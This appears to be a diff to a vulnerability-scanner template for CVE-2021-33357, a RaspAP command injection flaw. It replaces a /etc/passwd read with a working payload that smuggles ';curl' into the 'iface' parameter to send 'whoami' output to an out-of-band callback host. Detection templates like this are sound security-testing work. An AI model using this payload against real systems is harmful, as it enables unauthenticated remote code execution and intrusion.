Added working payload

cves/2021/CVE-2021-33357.yaml

@@ -1,22 +1,32 @@
 id: CVE-2021-33357
 
 info:
-  name: RaspAP RCE
-  author: pikpikcu
+  name: RaspAP <= 2.6.5 - Remote Code Execution
+  author: pikpikcu,pdteam
   severity: critical
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-33357
-    - hhttps://www.security-database.com/detail.php?alert=CVE-2021-33357
+    - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/
     - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-33357
+    - https://github.com/RaspAP/raspap-webgui
   description: RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.
-  tags: cve,cve2021,rce,raspap
+  tags: cve,cve2021,rce,raspap,oob
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=cat%20/etc/passwd"
+      - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;"
 
     matchers:
+      - type: word
+        part: interactsh_protocol
+        name: http
+        words:
+          - "http"
+
+    extractors:
       - type: regex
+        part: interactsh_request
+        group: 1
         regex:
-          - "root:.*:0:0"
+          - 'GET \/([a-z-]+) HTTP'